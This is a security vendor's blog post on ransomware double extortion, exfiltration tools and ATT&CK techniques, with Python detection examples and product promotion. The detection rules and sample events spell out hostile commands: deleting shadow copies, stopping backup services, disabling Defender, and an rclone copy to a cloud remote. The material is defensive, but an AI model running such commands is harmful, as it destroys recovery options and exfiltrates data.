
Ransomware Evolution and Data Exfiltration: A Deep Dive for Cybersecurity Analysts 

Brad LaPorte
28 Aug 2025
10 min read
Adaptive Exposure Management

Ransomware has evolved from a nuisance to one of the most devastating cyber threats in existence. 

Over the last decade, attackers have professionalized their operations and adopted double and triple extortion. These methods pair encryption with data exfiltration and the threat of public disclosure, so even organizations with robust, tested backups remain exposed: a restore recovers the files, but it does nothing about the stolen copy. 

This blog provides a detailed analysis of ransomware trends, techniques, and tools based on insights from Morphisec and third-party primary research. We’ll explore critical findings, the tools and techniques ransomware operators use for data exfiltration, and actionable recommendations for cybersecurity analysts to combat this growing threat. 

Ransomware’s Rise: A Statistical Overview 

Ransomware has cemented itself as one of the most disruptive forces in today’s cyber threat landscape. Between 2019 and 2023, it was behind nearly one-third of all security incidents, according to Cyentia’s IRIS report. Even more alarming, ransomware was responsible for 38% of all financial losses from cyber events during that same period.  

Smaller organizations—those with under $100 million in revenue—have been hit especially hard, with ransomware making up 30–40% of incidents in this group. For attackers, the draw is clear: ransomware offers a quick path to monetization, and double extortion tactics—stealing data before encryption—amplify both the financial and reputational damage to victims. 

The economic toll of ransomware has skyrocketed over the past five years. In 2019, the average cost of a ransomware incident was $686,000. By 2023, that number had surged to $3.7 million—a staggering 440% increase. At the extreme end, the most severe incidents (in the 95th percentile) can cost organizations up to $50 million each. Over a five-year span, ransomware events racked up an estimated $276 billion in total losses, reflecting a 140-fold increase in financial impact over the past decade. 

For security practitioners, these statistics aren’t just historical markers—they’re a call to action. They highlight the growing scale, sophistication, and business impact of ransomware, underscoring the need for robust prevention, rapid detection, and well-rehearsed response plans.  

Understanding the trajectory of ransomware’s rise helps defenders anticipate its evolution and better prepare their organizations for the threats ahead. 

Data Exfiltration: A Key Component of Ransomware 

Ransomware has evolved far beyond simply locking up a victim’s files.  

Today, most major ransomware operations pair encryption with data theft—stealing sensitive information before encrypting it and then threatening to leak or sell it if the ransom isn’t paid. This “double extortion” model has become the industry standard for cybercriminals, making attacks far more damaging and difficult to recover from.  

Some groups have gone even further, using “triple extortion” tactics to pressure victims by targeting their customers, partners, or other third parties linked to their business. For security practitioners, this shift means the impact of a ransomware attack can ripple far beyond the initial compromise, escalating reputational damage, regulatory risk, and financial fallout. 

To carry out these attacks, adversaries are increasingly relying on a mix of purpose-built malware and “dual-use” tools—legitimate software co-opted for malicious ends. Symantec’s research shows that dual-use tools now dominate the ransomware data exfiltration playbook, giving attackers stealth, flexibility, and the ability to blend in with normal network activity.  

Symantec found that the most frequently abused tool is Rclone, an open-source command-line cloud storage client that lets attackers push stolen data to storage they control. Remote access tools such as AnyDesk, ScreenConnect, and Atera are also common, giving attackers an interactive foothold from which to stage files, transfer data, and move laterally. Cobalt Strike, originally built for red-team engagements, supplies covert command-and-control channels that mimic legitimate web traffic, making detection harder still. 

Attackers also use compression and archiving tools like WinRAR and 7-Zip to package (and often password-protect) data before exfiltration, backup utilities like Restic to push stolen data to cloud storage providers such as Amazon S3 or Google Cloud, and tunneling tools like Chisel to create encrypted links to their own infrastructure. To make these tools harder to spot, they often rename the executable, for example disguising "rclone.exe" as "svchost.exe", so it looks like a legitimate system process. Renaming changes neither the file hash nor the version metadata embedded in the binary, and it does not change the tool's command-line grammar, so endpoint telemetry that records those fields still has something to match on. 

For defenders, understanding these tools and tactics isn’t just a matter of threat intelligence—it’s a blueprint for building better detection and prevention strategies. Knowing what attackers are likely to use, and how they try to hide it, helps practitioners tune defenses, hunt for early warning signs, and shut down exfiltration before the ransom note even appears. 

Ransomware Campaigns and Techniques 

The Big Names Behind the Biggest Breaches 

Over the past five years, a handful of ransomware groups have dominated the threat landscape—Cl0p, LockBit 3.0, Conti, and ALPHV/BlackCat. These aren’t just opportunistic hackers; they’re highly organized operations that innovate constantly to stay ahead of defenses.  

Groups like Cl0p have shown how quickly they can scale their attacks by exploiting a single high-profile vulnerability—such as the MOVEit file transfer flaw—to compromise hundreds of organizations in one campaign.  

For practitioners, knowing these names isn’t just trivia; it’s essential situational awareness. Tracking their methods, infrastructure, and favorite exploits can help defenders anticipate—and block—their next move. 

Their Favorite TTPs—and Why They Work 

Ransomware operators tend to follow a predictable playbook, but it’s a playbook that works frighteningly well. Here are the top 10 techniques, as aligned to MITRE ATT&CK:   

Initial Access 

  • T1190 – Exploiting Public-Facing Applications: Attackers exploit vulnerabilities in internet-facing applications as a primary entry point. Regular patching and hardening of web applications are crucial to mitigate this risk. 
  • T1566 – Phishing: Social engineering via phishing emails remains a common tactic to deliver malware or steal credentials. Despite modern defenses, well-crafted phishing campaigns still penetrate organizations. 
  • T1133 – Exploiting External Remote Services: Weak configurations in RDP, VPN, or other remote access services allow attackers easy access. Enforcing MFA and monitoring remote access traffic are essential for protection. 

Post-Compromise 

  • T1059 – Command and Scripting Interpreter: Attackers use tools like PowerShell and Bash to execute commands undetected. Tightening script policies and monitoring script activity can disrupt their plans. 
  • T1562 – Impair Defenses: Disabling antivirus, firewalls, and endpoint detection tools is a common first step post-compromise. Logging these actions provides critical early warning signs of an attack. 
  • T1489 – Service Stop: Services that would block or survive encryption, including EPP/EDR agents, backup agents, and database engines holding files open, are often stopped before the payload runs. Monitoring for unexpected service stops, especially several in quick succession, is a cheap early signal. 

Exfiltration and Impact 

  • T1486 – Data Encrypted for Impact: Encrypting victim data is central to ransomware attacks, disrupting operations and increasing leverage over victims. 
  • T1490 – Inhibit System Recovery: Attackers delete backups and Volume Shadow Copies (typically with vssadmin or wmic) and disable Windows recovery options so that restoring without paying is as hard as possible. Offline or immutable backups, tested regularly, are the countermeasure. 
  • T1567 – Exfiltration Over Web Service: Stolen data is uploaded to attacker-controlled cloud services for double extortion. Monitoring outbound traffic for unusual uploads is key to detecting this activity. 
  • T1048 – Exfiltration Over Alternative Protocol: Attackers use DNS tunneling or other non-standard protocols to exfiltrate data while evading detection. Analyzing network traffic for anomalies can uncover these tactics. 

For practitioners, understanding these TTPs is about more than threat intel—it’s about mapping them to your own environment so you can detect, disrupt, and contain them faster. 
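One way to start that mapping is to turn the TTPs above, together with the renamed dual-use tools described earlier (the Rclone-as-svchost.exe trick), into rules over process-creation telemetry. The block below is an added example and not Morphisec code: the field names loosely follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine), the event records are constructed for the example, and the service names in the T1489 rule are assumptions to be tuned to your estate.

```python
"""Rule-based triage of Windows process-creation telemetry for the ransomware
TTPs listed above. Added example, not Morphisec code. Field names loosely
follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine); the events
below are constructed for the example."""
import re
from typing import Dict, List, Tuple

# Dual-use tools that attackers routinely rename on disk. A rename does not
# touch the PE version resource, so OriginalFileName (when the tool ships one;
# attackers can strip it, so treat this as one signal, not the only one) still
# identifies the binary.
DUAL_USE_ORIGINAL_NAMES = {
    "rclone.exe", "anydesk.exe", "chisel.exe", "restic.exe",
    "7z.exe", "winrar.exe", "rar.exe",
}

# Command-line patterns keyed to ATT&CK technique IDs. Deliberately narrow;
# the service names under T1489 are assumptions and should match your estate.
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("T1490", "volume shadow copies deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("T1490", "Windows recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1490", "backup catalog deleted",
     re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I)),
    ("T1489", "backup/security service stopped",
     re.compile(r'(\b(net1?|sc)(\.exe)?\s+stop|Stop-Service(\s+-Name)?)\s+"?[\w ]*?'
                r'(veeam|backup|mssql|sense|windefend|sophos|crowdstrike)', re.I)),
    ("T1562.001", "Defender real-time protection disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I)),
    ("T1562.004", "host firewall disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    # rclone grammar is "<verb> <source> <remote>:<path>". Requiring two or more
    # characters before the colon skips plain drive-letter copies (D:\...).
    ("T1567.002", "rclone-style copy to a cloud remote",
     re.compile(r"\b(copy|copyto|sync|move)\s+\S+\s+[\w-]{2,}:\S*", re.I)),
]

# Constructed events: one benign svchost, one renamed rclone, three TTP hits,
# and one ordinary file copy that must not trigger the rclone rule.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 4312, "Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"pid": 5120, "Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\ProgramData\svchost.exe copy C:\Finance mega:loot --transfers 32"},
    {"pid": 5201, "Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 5210, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'cmd.exe /c net stop "Veeam Backup Service" /y'},
    {"pid": 5230, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"pid": 5300, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd.exe /c copy C:\Reports\q3.xlsx D:\Archive\q3.xlsx"},
]


def triage(events: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    """Return one (pid, technique_id, description) tuple per matching signal."""
    findings: List[Tuple[int, str, str]] = []
    for ev in events:
        pid = int(ev["pid"])
        image = str(ev.get("Image", "")).rsplit("\\", 1)[-1].lower()
        orig = str(ev.get("OriginalFileName", "")).lower()
        cmd = str(ev.get("CommandLine", ""))
        # Renamed dual-use tool: the on-disk name no longer matches the PE metadata.
        if orig in DUAL_USE_ORIGINAL_NAMES and image != orig:
            findings.append((pid, "T1036.005", f"{orig} running under the name {image}"))
        for tid, desc, pattern in RULES:
            if pattern.search(cmd):
                findings.append((pid, tid, desc))
    return findings


def by_technique(findings: List[Tuple[int, str, str]]) -> Dict[str, int]:
    """Count findings per technique ID, handy for a first-look dashboard."""
    counts: Dict[str, int] = {}
    for _, tid, _ in findings:
        counts[tid] = counts.get(tid, 0) + 1
    return counts


if __name__ == "__main__":
    for pid, tid, desc in triage(SAMPLE_EVENTS):
        print(f"pid={pid} {tid}: {desc}")
```

Run it and the renamed Rclone is caught twice, once on metadata and once on its command line, while the plain cmd.exe copy is left alone. In production the rules are a starting point: pair them with the file hash and the parent process, and expect to tune the service-name list.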

Sector-Specific Insights 

Some industries simply have more to lose—or are easier to disrupt. Manufacturing, Transportation, and Education top the list, with ransomware responsible for 80% of all cyber losses in these sectors. Healthcare and Hospitality are also frequent targets, thanks to their combination of sensitive data and operational urgency. 

For smaller businesses (under $100M in revenue), ransomware is a far more common occurrence—accounting for 30–40% of breaches. Large enterprises may face fewer incidents, but their attacks tend to be more complex and may hit multiple times in a single year.  

For practitioners, this means defenses must be scaled to your risk profile: SMBs need affordable, layered security that stops the most common entry points, while large enterprises must prepare for sustained, multi-vector campaigns. 

Defensive Strategies That Work 

  1. Monitor and Mitigate Dual-Use Tools: Since attackers lean on legitimate tools, application allowlisting (AppLocker or WDAC on Windows) can block executables that are not approved for a given host, while behavioral monitoring can flag activity like bulk file transfers from a workstation. Locking down scripting environments cuts off one of their most versatile tools; note that PowerShell constrained language mode only holds when it is enforced through an AppLocker or WDAC policy, since the environment-variable method is trivial to bypass. 
  2. Harden Remote Access Solutions: Do not expose RDP directly to the internet; put it behind a VPN or gateway, restrict source IP ranges, enforce MFA, and audit VPN/RDP logs regularly for logins from new locations or at odd hours. Given how often attackers walk in through these services, a weak configuration here is like leaving the front door wide open. 
  3. Strengthen Data Backup Practices: Immutable backups, stored offline or on write-once media and reachable only with credentials that are not part of the production domain, are your insurance policy against encryption. Regular restoration testing, including timing a full restore, ensures they will actually work when you need them most. 
  4. Detect and Respond to Exfiltration: Outbound traffic monitoring is non-negotiable. Large transfers to unfamiliar IPs or cloud services should be a red flag, especially when measured against the host's own normal daily volume, and unusual DNS query patterns deserve the same scrutiny. Data Loss Prevention (DLP) tools can add another layer of visibility and control. 
  5. Sector-Specific Safeguards: High-risk industries like Manufacturing and Healthcare should prioritize network segmentation to slow down lateral movement. Smaller organizations can tap into free resources like StopRansomware.gov for practical guidance and playbooks. 
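To make item 4 concrete, the block below applies two network-side heuristics to constructed telemetry: a per-host outbound volume check for the web-service exfiltration described under T1567, and a DNS-tunnelling check for the alternative-protocol exfiltration described under T1048. It is an added example and not Morphisec code; the flow and DNS records are made up, only loosely resemble Zeek conn.log and dns.log rows, and the thresholds and per-host baselines are assumptions.

```python
"""Network-side exfiltration heuristics: outbound-volume spikes from internal
hosts to external destinations (T1567) and DNS-tunnelling indicators
(T1048.003). Added example, not Morphisec code. The flow and DNS records are
constructed and only loosely resemble Zeek conn.log / dns.log rows."""
import hashlib
import ipaddress
import math
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

MB = 1024 * 1024
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def outbound_spikes(flows: List[Dict[str, object]], baseline: Dict[str, int],
                    floor: int = 200 * MB, factor: float = 10.0) -> List[Tuple[str, str, int]]:
    """Sum bytes each internal host sends to each external destination and
    flag pairs above both an absolute floor and `factor` x the host's normal
    daily outbound volume (the baseline is learned elsewhere and passed in)."""
    totals: Dict[Tuple[str, str], int] = defaultdict(int)
    for f in flows:
        src, dst = str(f["src"]), str(f["dst"])
        if is_internal(src) and not is_internal(dst):
            totals[(src, dst)] += int(f["orig_bytes"])
    hits: List[Tuple[str, str, int]] = []
    for (src, dst), sent in totals.items():
        if sent > max(floor, factor * baseline.get(src, floor)):
            hits.append((src, dst, sent))
    return sorted(hits)


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def dns_tunnel_candidates(queries: List[Dict[str, str]], min_unique: int = 50,
                          min_label_len: int = 30, min_entropy: float = 3.0) -> List[Tuple[str, str, int]]:
    """Group queries by (client, parent domain) and flag parents that receive
    many unique, long, high-entropy leftmost labels: the shape of data being
    encoded into query names. Parent = last two labels, which is crude (it
    mis-groups co.uk-style suffixes); use a public-suffix list in production."""
    first_labels: Dict[Tuple[str, str], set] = defaultdict(set)
    for q in queries:
        labels = q["query"].lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        first_labels[(q["client"], ".".join(labels[-2:]))].add(labels[0])
    hits: List[Tuple[str, str, int]] = []
    for (client, parent), labels in first_labels.items():
        if len(labels) < min_unique:
            continue
        avg_len = sum(map(len, labels)) / len(labels)
        avg_ent = sum(map(shannon_entropy, labels)) / len(labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            hits.append((client, parent, len(labels)))
    return sorted(hits)


# Constructed telemetry. 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges standing in for attacker-controlled and ordinary external hosts.
SAMPLE_FLOWS: List[Dict[str, object]] = [
    {"src": "10.1.5.20", "dst": "203.0.113.7", "dst_port": 443, "orig_bytes": 400 * MB},
    {"src": "10.1.5.20", "dst": "203.0.113.7", "dst_port": 443, "orig_bytes": 450 * MB},
    {"src": "10.1.5.20", "dst": "203.0.113.7", "dst_port": 443, "orig_bytes": 380 * MB},
    {"src": "10.1.5.20", "dst": "198.51.100.10", "dst_port": 443, "orig_bytes": 2 * MB},
    {"src": "10.1.7.30", "dst": "10.1.1.1", "dst_port": 445, "orig_bytes": 5000 * MB},  # internal, ignored
    {"src": "10.1.9.40", "dst": "203.0.113.99", "dst_port": 443, "orig_bytes": 300 * MB},  # within 10x baseline
]
BASELINE_BYTES: Dict[str, int] = {"10.1.5.20": 50 * MB, "10.1.9.40": 150 * MB}  # assumed daily outbound per host


def _tunnel_label(i: int) -> str:
    """Stand-in for a chunk of encoded data in the leftmost label (constructed)."""
    return hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]


SAMPLE_DNS: List[Dict[str, str]] = (
    [{"client": "10.1.5.20", "query": f"{_tunnel_label(i)}.t.example.net"} for i in range(60)]
    + [{"client": "10.1.7.30", "query": f"img{i}.static.example.org"} for i in range(60)]  # many unique but short
    + [{"client": "10.1.7.30", "query": "www.example.com"}]
)


if __name__ == "__main__":
    print(outbound_spikes(SAMPLE_FLOWS, BASELINE_BYTES))
    print(dns_tunnel_candidates(SAMPLE_DNS))
```

The volume check deliberately compares against each host's own baseline rather than a single global number, which is why 10.1.9.40's 300 MB is not flagged while 10.1.5.20's 1.2 GB to one unfamiliar address is. The DNS check needs all three conditions (many unique labels, long labels, high entropy) so that a CDN with thousands of short image hostnames does not trip it.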

Flipping the Script on Cyber Extortion 

Modern ransomware has evolved beyond encryption: it is an extortion scheme that weaponizes stolen data. Attackers now routinely combine double and triple extortion with data encryption for impact, disabling of recovery mechanisms, and exfiltration via web services, scripts, and cloud accounts; between them these techniques appear in up to 97% of ransomware incidents. 

For practitioners, this means the old playbook (detect and respond) is no longer sufficient. You need to stop attacks before they can gain leverage. 

That’s where Morphisec’s Exfiltration Prevention comes into play. Powered by Automated Moving Target Defense (AMTD) and Adaptive Exposure Management (AEM), it delivers a proactive, signatureless strategy that takes the fight to the attackers—before they even start exfiltrating data. 

Here’s why this matters for security practitioners: 

  • Stops ransomware and data theft before execution: Morphisec neutralizes ransomware payloads and blocks a wide range of tactics—from encrypting data and disabling backups to cloud exfiltration, script-based theft, DNS tunneling, and USB-based transfers. 
  • Covers the full exfiltration playbook: This solution addresses the top 10 MITRE ATT&CK techniques tied to exfiltration and impact, providing broader protection than traditional reactive tools.
  • Signatureless, prevention-first approach: Without relying on behavioral analysis or IOC databases, Morphisec remains effective against novel and evasive threats—limiting dwell time and reducing alert fatigue. 
  • Enables business continuity and resilience: By stopping threats early, preserving recovery tools, and neutralizing exfiltration attempts, it helps maintain operations, reduce regulatory exposure, and shield sensitive data—even before attackers can act. 

In short, Morphisec doesn’t just reinforce your defenses—it redefines them. It shifts your security posture from reaction to disruption, turning ransomware’s own strategies against it before they can cause damage. For practitioners, that means real control, far less chaos, and a powerful leap ahead in cyber resilience. 

Learn more about Morphisec’s Impact Protection capabilities and schedule a demo to see it in action. 


About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak, both industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation for cybersecurity solutions years ahead of their time.
